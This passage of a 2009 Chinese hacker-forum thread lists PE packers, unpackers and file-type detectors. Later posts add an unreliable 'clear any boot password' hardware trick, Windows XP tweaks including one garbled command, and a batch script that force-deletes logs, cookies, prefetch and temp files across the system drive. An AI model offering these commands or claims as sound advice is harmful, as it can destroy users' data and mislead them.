Petite Ian Luck Homepage 能压缩PE文件的code, data等资源。
PE-PACK ANAKiN Homepage 一个自身体积小巧的压缩工具
PKLITE32 PKWARE, Inc. www.pkware.com 32-位压缩工具(DLL/EXE).
WWPack32 Piotr Warezak and Rafal Wierzbicki Homepage 32-位压缩工具(DLL/EXE).
NeoLite  Hompage 32-位压缩工具(DLL/EXE).
Shrinker Blink Inc Hompage 32-位压缩工具(DLL/EXE).

脱壳工具介绍(UNPACKERS)

  一般某种压缩工具的壳,都会有相应的脱壳工具,因此只要找到较新版本的脱壳工具, 一般的壳都

可轻易脱去。

常用脱壳工具(Windows Unpackers)列表: 名称 作者 主页 介绍
ASPack unpacker bane Homepage 脱ASPack的压缩PE文件。
UnPEPack M.o.D.  脱PEPack的壳
ProcDump32   十分优秀的"万能"脱壳工具,可惜不升级了,因此只能自动脱些老版本压缩工具的壳

,但可通过脚本命令使其升级。也是一款优秀的PE修改工具。

侦测文件类型工具

名称 介绍
FileInfo 能检测多种文件格式,脱壳前用来判断是否加壳或何种壳,推荐使用!
GetTyp 功能同上
TYP 功能同上
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 5楼 发表于: 2009-02-22 09:11:24
那个楼没人看~  郁闷  不知道沉哪去了!
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 6楼 发表于: 2009-02-22 09:19:01
小小一招巧解任何电脑的开机密码,无需任何工具   





--------------------------------------------------------------------------------

任何电脑当开机需要密码时, 只需将机箱打开, 把里面的声卡或其它任何一 个零件拔下来, 然后通电启动,主板自检后再强行关机, 把拔下的零件再插上去,开机,密码自动清除,百试百灵。
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 7楼 发表于: 2009-02-22 09:21:43
让Windows XP系统快上几倍的三个绝招 



--------------------------------------------------------------------------------
1、减少开机磁盘扫描等待时间,开始→运行,键入“chkntfs /t:0”



2、删除系统备份文件: 在各种软硬件安装妥当之后,其实XP需要更新文件的时候就很少了。 开始→运行,*敲入:**c.exe /purgecache 然后回车即可,近3xxM。



3、压缩文件夹   这是一个相当好的优化,Windows XP内置了对.ZIP文件的,我们可以把zip文件当成文 件夹浏览。不过,系统要使用部分资源来实现 这一功能,因此禁用这一功能可以提升系统 性能。实现方法非常简单,只需 取消zipfldr.dll的注册就可以了,点击开始——运行,*敲入: regsvr32 /u zipfldr.dll 。然后回车即可。
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 8楼 发表于: 2009-02-22 09:23:14
清除系统LJ.bat
@echo off
echo 正在清除系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo 清除系统LJ完成!
echo. & pause

写成文本文档.后缀写成.bat就OK啦.

是很好用的东西.

网吧似乎不能用哦

只是家里哈!


该文章转自[黑羽黑客技术论坛] bbs.hackyuyi.cn
原文地址:http://bbs.hackyuyi.cn/dispbbs_63_713.html
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 9楼 发表于: 2009-02-22 09:31:54
      顶~!!!!!!
快速回复
限100 字节
 
上一个 下一个